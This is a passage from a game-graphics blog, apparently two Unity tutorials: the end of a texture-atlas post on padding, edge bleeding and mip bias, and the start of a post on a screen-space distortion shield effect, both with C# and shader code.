<span class="n">rect</span><span class="p">.</span><span class="n">width</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">rect</span><span class="p">.</span><span class="n">height</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="n">y</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Color</span> <span class="n">pixel</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">y</span> <span class="o">/</span> <span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">x</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span><span class="n">y</span><span class="p">,</span> <span class="n">pixel</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, now we’re talking!</p>
<p>Notice that we have a check in there to make sure that we never add so much padding that a texture is completely invisible on the atlas, or so much padding that the padded areas overlap.</p>
<h3 id="edge-bleeding">Edge Bleeding</h3>
<p>So this is great, and is going to make sure that (at least on the higher resolution mips), our textures aren’t going to bleed into each other. Unfortunately it means (at least right now), that they’ll instead pick up whatever value we clear our texture to. What we want to do next is to make sure that the areas that contain our padding are filled with the edge colour of the textures inside them. This is going to give us an atlas that looks something like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/paddedatlasedges.png" />
<br />
<br />
</div>
<p>To do this, the easiest way is to simply set the wrapMode of our readableTex to clamp and sample UVs outside of 0 to 1 for the padding regions. In code, this looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//Some Code Omitted For Brevity</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgByes</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">localPadding</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">padding</span><span class="p">,</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span><span class="mi">4</span><span class="p">);</span>
<span class="n">Rect</span> <span class="n">innerRect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">width</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">height</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="n">y</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">xSample</span> <span class="o">=</span> <span class="n">x</span> <span class="o">-</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">innerRect</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ySample</span> <span class="o">=</span> <span class="n">y</span> <span class="o">-</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">innerRect</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">Color</span> <span class="n">pixel</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">xSample</span> <span class="o">/</span> <span class="n">innerRect</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">ySample</span> <span class="o">/</span> <span class="n">innerRect</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">,</span> <span class="n">pixel</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">packedRects</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">innerRect</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we have to replace the rectangle in our packedRect array with the padded one, otherwise when we use that UV rect, it will include the padding area around the texture, which is less than ideal.</p>
<p>Perfect! Now what about those areas that have no texture in them at all… they’re still going to be a problem when we start using lower resolution mips, so we need to fill them in too. What’s worked for me in the past is visit every pixel, and if it isn’t contained in a UV rect, look along the horizontal and vertical axis until you find the closest pixel that is, and shade using that color.</p>
<p>Your atlas will end up looking something like what I have below. For the purposes of this example, I shrank the rock texture in the above atlas to make some more space.</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasedgebleedgaps.png" />
<br />
<br />
</div>
<p>The code changes to make this work are a bit more involved than before, so I’m going to go through each part instead of throwing all the code at you at once.</p>
<p>First, since we’re going to need to look up colours our packed textures after they’ve been placed, we’re going to need to store the readable textures we create in an array that we can access later:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Texture2D</span><span class="p">[]</span> <span class="n">readables</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">[</span><span class="n">textures</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span></code></pre></figure>
<p>Then in the body of the packing loop, we need to assign the readable textures we create to this array:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">readables</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">;</span></code></pre></figure>
<p>So far so easy right? Now, after we get out of the packing loop, we need to add a second set of loops, which is going to iterate over all the pixels in our output atlas, and check if they are contained in any of our (unpadded) UV rects. If they aren’t, we’ll grab the texture in the one that’s closest and call GetPixelBilinear again:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">outAtlas</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="o">++</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">outAtlas</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="o">++</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">closestDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Color</span> <span class="n">c</span> <span class="o">=</span> <span class="n">Color</span><span class="p">.</span><span class="n">clear</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">r</span> <span class="o"><</span> <span class="n">packedRects</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="o">++</span><span class="n">r</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">curRect</span> <span class="o">=</span> <span class="n">packedRects</span><span class="p">[</span><span class="n">r</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curRect</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="k">new</span> <span class="n">Vector2</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)))</span>
<span class="p">{</span>
<span class="n">closestDist</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">d</span> <span class="o">=</span> <span class="n">DistanceToRect</span><span class="p">(</span><span class="n">curRect</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">d</span> <span class="o"><</span> <span class="n">closestDist</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">closestDist</span> <span class="o">=</span> <span class="n">d</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">uvX</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">curRect</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="o">/</span> <span class="n">curRect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">uvY</span> <span class="o">=</span> <span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">curRect</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="o">/</span> <span class="n">curRect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">readables</span><span class="p">[</span><span class="n">r</span><span class="p">].</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">uvX</span><span class="p">,</span> <span class="n">uvY</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">closestDist</span> <span class="o">></span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">,</span><span class="n">c</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span></code></pre></figure>
<p>Not the fastest code in the world, but it churns throuh filling in the space on an almost empty 2048x2048 texture in a few seconds on my laptop so I’m calling it good enough for a build time tool. It’s important to make sure that you only call outAtlas.Apply() at the end of your function, as that’s the call that persists data to disk and is very slow, if you call it inside a loop you’ll be waiting for awhile.</p>
<p>The last bit of code we need is the body of the DistanceToRect function, which returns the distance from a given point to the edge of a rectangle:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">float</span> <span class="nf">DistanceToRect</span><span class="p">(</span><span class="n">Rect</span> <span class="n">r</span><span class="p">,</span> <span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">int</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">xDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">yDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">xDist</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">Mathf</span><span class="p">.</span><span class="n">Abs</span><span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">center</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">yDist</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">Mathf</span><span class="p">.</span><span class="n">Abs</span><span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">center</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">height</span> <span class="o">/</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="n">xDist</span> <span class="o">*</span> <span class="n">xDist</span> <span class="o">+</span> <span class="n">yDist</span> <span class="o">*</span> <span class="n">yDist</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h2 id="wrapping-things-up">Wrapping Things Up</h2>
<p>What we have now is a perfectly good Texture Atlasser! With padding and edge bleed, the mips you care most about (the higher resolution ones) are likely going to be completely unblemished. If anything here wasn’t clear, or you just want some source, it’s available at the end of this post.</p>
<p>However, there’s one more thing you can do to make this really shine. If you’re following along, you may have realized that even with all of this set up (and padding cranked), there isn’t really much you can do about the smallest mip level. There’s just too little resolution to reasonably store information about different textures, and no matter how much padding you add, you still end up with some mipping artifacts:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasnomipbias.png" />
<font size="1">I had to zoom in on my image to highlight the artifacts, forgive the low resolution</font>
<br />
<br />
</div>
<p>To get around this, you can set the mip bias of the texture to a negative number, so that it always will pull from a higher mip map. This will make your texture sharper, and prevent it from hitting the lowest mip level (assuming you bias it to -1). This obviously has minor performance implications, but assuming you have the wiggle room to weather them, it’s going to get you a much nicer looking scene.</p>
<p>The code to do this is a little odd because Unity doesn’t really let you control anything about your mip maps unless you do it when the texture is imported, this is a bit odd, given that you can write other metadata (like we did with our wrapMode earlier) before you save the asset to disk, but regardless, we’re going to need to write a custom texture importer to set our mip bias.</p>
<p>Custom asset importers are pretty easy to build with unity. Here’s one that gets us the mip bias value we want on our input atlasses:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">AtlasImporter</span> <span class="o">:</span> <span class="n">AssetPostprocessor</span>
<span class="p">{</span>
<span class="k">private</span> <span class="kt">void</span> <span class="n">OnPostprocessTexture</span><span class="p">(</span><span class="n">Texture2D</span> <span class="n">import</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">assetPath</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="s">"Atlasses"</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">import</span><span class="p">.</span><span class="n">mipMapBias</span> <span class="o">=</span> <span class="o">-</span><span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Make sure to put this on a script located in your Editor folder in our Project Hierarchy, or the code won’t get run. Assuming you’ve done all that correctly, when you regenerate (or reimport) your atlas, those far away seams should be completely cleared up:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasmipbias.png" />
<br />
<br />
</div>
<p>You’ll notice that what texture data is present in the image changes when I change the mip bias, this is expected because we are literally sampling from a different, higher resolution mip map in the second photo, so things aren’t going to look 100% identical to when we didn’t have the bias set.</p>
<p>With that done, we have our atlasser! It’s worth noting that this won’t solve all your problems if the input textures to your atlasser arent power-of-two sized. If that isn’t the case for you, you’ll want to generate your own mips in addition to everything we’ve talked about here. I recommend not letting an NPOT texture get in an atlas meant for 3D content, but if you for some reason must do that, more info is available <a href="http://http.download.nvidia.com/developer/NVTextureSuite/Atlas_Tools/Texture_Atlas_Whitepaper.pdf">from NVidia</a></p>
<p>Whew, this covered a lot of ground! In case you weren’t following along at home, all the code that I’ve talked about here has been <a href="https://gist.github.com/khalladay/0cc73bfe3445a862a6e5a7faeec17322">uploaded to github</a></p>
<p>If you have any questions about this, or spot a mistake, shoot me an email, or a twitter message. I check twitter…sorta…not frequently, but I will eventually see it if you send me something there. My email / twitter is available in the sidebar. Have a good one!</p>
Screen Space Distortion and a Sci-fi Shield Effect2016-01-15T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion<p>Sometimes inspiration comes from the weirdest places. I was idly browsing reddit after work awhile ago and stumbled onto this post by user <a href="http://reddit.com/u/Guillaume_Langis">Guillaume_Langis</a>. It was a gif of a shield effect that they had created for their game <a href="http://projectwarfleet.blogspot.ca/">Warfleet</a>. The comments section on that site was filled (predictably) with users asking how they effect was done, and Guillame ended up actually posting the c# and shader source online for people to play with, which is awesome (thanks!)</p>
<p>The effect already looks great, but when I think of a sci-fi shield I think of distortion, and wobbling “force field” style effects, which is what I’m going to add to the shield effect, talk about in this article and use to turn the shield effect into this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/spaceshipteaser.gif" />
<br />
<br />
</div>
<h2>Some Initial Housekeeping</h2>
<p>The space ship in these screen shots is available free on the asset store, and the texture I threw on the shield was just one I got by googling for “plasma texture.” I also took the liberty of optimizing the original effect which was posted to reddit. You can find the original code <a href="https://www.dropbox.com/s/y083i4mz0f4n81o/Shield%20Effect.zip?dl=0">here</a>.</p>
<p>All the scripts and shaders used in this post will be available at the end of the article, but to start with, I’ve uploaded a unity project with a scene set up with this effect ready to go so that it’s easy to follow along <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpVzZkbkM1bjdDNU0&usp=sharing">here</a>. This article is about how to build a distortion effect, not about how to create to shield effect so it won’t be explained, but it will be a lot easier to follow this post if you have a project set up with it. I haven’t included the space ship or space textures from the screenshots because I didn’t make those, but you should be able to get them yourself pretty easily. As we go through this post, my screenshots will alternate between what the sample scene should look like and what it looks like with real assets.</p>
<p>Ok, now that that’s out of the way, time to get cracking.</p>
<h2>The Basics of Screen Space Distortion</h2>
<p>Let’s start by talking about what exactly a Screen Space Distortion effect is. You’ve definitely seen the effect before, it’s used to render everything from refraction to heat haze to trippy drug sequences in games, and it’s actually really simple.</p>
<p>At it’s core, all the effect requires is that you render your main camera (the one which will show the distortion) to a texture instead of rendering it directly to the framebuffer, then blit it (draw it) to the frame buffer from that texture using a shader which offsets the uvs used to sample your main camera texture.</p>
<p>A really simple example might look something like this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/warp.png" />
<br />
<br />
</div>
<p>Of course, there isn’t a one size fits all way to modify the UV coordinates, which is where the fun starts. But before we get there, lets walk through the code required to make the trivial example above actually functional.</p>
<p>First, we need to get our main camera rendering to a secondary texture. Usually when you want a camera to render to a texture in Unity you use the targetTexture attribute of the camera component, but not today. Unity is a bit quirky here, but I’ve found in practice that you can’t blit a texture to the frame buffer if that texture is currently a camera’s target texture. Since we’re going to be blitting this texture to the framebuffer as we apply our post effect, we need to use a different bit of api:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">ScreenSpaceDistortionEffect</span> <span class="o">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="n">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The SetTargetBuffers call is how we are going to work around the targetTexture weirdness, if you attach this component to your main camera object, you should see that nothing is different in your game view than before we wrote this script, but behind the scenes, we have ourselves a nice easy to work with RenderTexture for our game. Which is perfect!</p>
<p>Now all we need to do is distort that texture. If you look at <a href="http://docs.unity3d.com/ScriptReference/Graphics.Blit.html">the docs</a> for Graphics.Blit, you’ll find that you can specify a material. If you think of Graphics.Blit like a full screen quad, then the material you specify here is just the material on that Quad. Blit automatically sets the _MainTex property of this material to your source render texture. Since all we need to do is modify the texture coordinates that we map to the screen, we can get by with a pretty simple material. The example above uses the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">fixed2</span><span class="p">(</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">sin</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span> <span class="o">*</span> <span class="mi">100</span><span class="p">)</span><span class="o">*</span><span class="mf">0.01</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="p">);</span>
<span class="err">}</span></code></pre></figure>
<p>I’m going to call this shader our “composite” shader, since it’s what we’re going to use to combine data about how to render the distortion effect with our regular camera view.</p>
<p>Now you just need to modify the earlier c# code to use this new shader, and you should see exactly the same type of effect across your screen.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
<span class="n">mainCam</span><span class="p">.</span><span class="n">SetTargetBuffers</span><span class="p">(</span><span class="n">screenRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">screenRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">effectMaterial</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Material</span><span class="p">(</span><span class="n">Shader</span><span class="p">.</span><span class="n">Find</span><span class="p">(</span><span class="s">"Custom/Composite"</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">OnPostRender</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="n">Blit</span><span class="p">(</span><span class="n">screenRT</span><span class="p">,</span> <span class="p">(</span><span class="n">RenderTexture</span><span class="p">)</span><span class="n">null</span><span class="p">,</span> <span class="n">effectMaterial</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Voila! We now officially have our post effect working!</p>
<h2>An Actually Useful Implementation</h2>
<p>Now that we have the basics down, it’s time for us to decide how we should go about modifying our screen uvs. Unless you’re going for some sort of drug trip / dream sequence effect, performing arithmetic on the uvs alone is likely not going to cut it. Today we’re going to create a secondary screen buffer (the “shield” buffer), and draw our shield(s) into it using a replacement shader. We’ll then use the contents of that buffer to deform our screen uvs.</p>
<p>But before we get to the replacement shader, let’s just render our shield as is into the secondary buffer (to make sure the buffer is working at all).</p>
<p>We’re going to be modifying our C# script again. We need to create the second render texture for the shield, but we don’t need this one to be at full screen res, since we aren’t going to be actually using it for colours in the framebuffer, and it’s much lighter on your gpu to only draw into the smaller buffer. Then we need to set up our camera, and get it rendering into this buffer. Here’s what that looks like:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RenderTexture</span> <span class="n">shieldRT</span><span class="p">;</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">distortCam</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">effectMaterial</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">screenRT</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Repeat</span><span class="p">;</span>
